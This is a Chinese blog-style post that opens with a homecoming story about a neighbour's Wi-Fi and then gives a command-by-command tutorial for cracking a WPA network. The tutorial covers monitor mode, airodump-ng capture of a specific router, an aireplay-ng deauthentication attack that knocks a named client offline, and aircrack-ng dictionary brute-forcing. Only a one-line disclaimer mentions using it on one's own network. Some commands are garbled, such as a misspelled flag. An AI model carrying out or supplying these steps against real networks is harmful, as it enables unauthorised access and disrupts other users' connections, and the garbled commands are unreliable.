老王的Wifi

老王的Wifi

0x00 前言

在一个寒冷的冬日，我拖着重重的行李，踏上了回老家过年的路。老家的风景依旧，但每次回来总有一种说不出的亲切感涌上心头。

我推开家门，一股熟悉而温馨的气息扑面而来。然而，当我拿出手机想要连接网络时，却发现老家依然没有安装无线网络。我不禁有些失落，毕竟在现代社会，手机已经成为了我们生活中不可或缺的一部分。

正当我犹豫着要不要去镇上找个网吧时，忽然想起了邻居老王。老王是个热情好客的人，每次我回老家都会和他聊聊天，分享一些生活中的趣事。

我走到老王的门前，轻轻敲了敲门。不一会儿，门开了，老王那张熟悉而亲切的笑脸出现在我面前。

“哟，你回来啦！”老王热情地招呼道。

“是啊，老王，我过年回来了。”我笑着回应。

“快进来坐，外面冷。”老王热情地邀请我进屋。

我跟着老王进了屋，坐在了温暖的火炉旁。我们聊了一会儿家常，我忽然想起了无线网络的事情。

“老王，你家有无线网络吗？我这手机没网有点不方便。”我试探着问道。

“当然有啦，你直接用就行。”老王爽快地答道。

我心中一喜，连忙问道：“那密码是多少啊？”

老王笑了笑，神秘地说：“密码啊，你等会儿，我去给你拿张纸写下来。”

说着，老王起身走到里屋，不一会儿就拿着一张纸走了出来。我接过纸一看，上面赫然写着几个数字：“12345678”。

“这么简单？”我有些惊讶地问道。

老王嘿嘿一笑，说：“这密码用了好几年了，一直没换过。我觉得简单点好记，省的到时候自己都忘了。”

我笑着点了点头，心中对老王的朴实和热情有了更深的感受。我输入了密码，手机顺利地连接上了无线网络。我感激地向老王道了谢，然后和他继续聊起了家常。

那天的聊天很愉快，我们聊了很多关于老家的事情，也分享了一些彼此的生活经历。在老王家蹭网的时间里，我感受到了家乡的温暖和人与人之间的情谊。虽然老家没有城市的繁华和便利，但却有着一种独特的魅力和人情味。

0x01 连接Wifi

首先我们需要一个支持Linux监听的无线网卡
比较合适的有以下几个：

RT3070(L)/RT5572：即插即用，支持混杂模式、注入模式、AP模式
RT8187(L)：即插即用，支持混杂模式、注入模式、AP模式
AR9271：即插即用，支持混杂模式、注入模式、AP模式

在虚拟机-可移动设备里连接无线网卡

这里可以查看右下方是否点亮，点亮即为成功

确认连接完成后
输入airmon-ng查看网卡是否支持监听模式

再输入iwconfig，查看无线网络设备信息

开启网卡监听

airmon-ng start wlan0

网卡监听模式开启后
无线接口wlan0变成wlan0mon
使用ifconfig -a 命令进行查看

前期准备工作已完成

1.1 准备抓取数据包

扫描环境中的WiFi网络：

airodump-ng wlan0mon

使用airodump-ng命令是列出无线热点的地址、信道等
使用名称为714的无线热点

输入命令

sudo airodump-ng -w freedom -c 10 --bssid 24:7E:51:03:1B:C8 wlan0mon -ignore-nefative-oneaa

其中-c是指定的信道
--bssid为路由器的MAC地址

使用命令后，发现两台客户机连接路由器，使用下方客户机MAC地址。

1.2 抓取数据包并爆破

重新开启一个窗口，输入：

aireplay-ng -0 2 -a 24:7E:51:03:1B:C8 -c 0C:2C:54:EB:1A:2C wlan0mon
-a：指定路由器的MAC
-c：指定客户机的MAC

执行成功后，表明该客户机已被成功踢下线
经测试，发现目标机被强制下线后仍会自动连接

成功抓到包之后
需要ctrl+c退出抓包
我们会在桌面上看到成功抓到的数据包

开始破解，使用密码生成工具生成8位数的字典
将生成的字典放到同一目录下

sudo aircrack-ng -w  Wifi_pwd.txt freedom-*.ivs

成功爆破出密码

0x02 总结

如遇到无法扫描网段的情况，可以将本机重新启动
成功与否基本全靠字典的强大
仅供使用自己的WiFi作为学习和测试，不要轻易私自破解他人WiFi
最后附上支持的无线网卡参考：

https://www.cnblogs.com/zysps1/p/kali_linux.html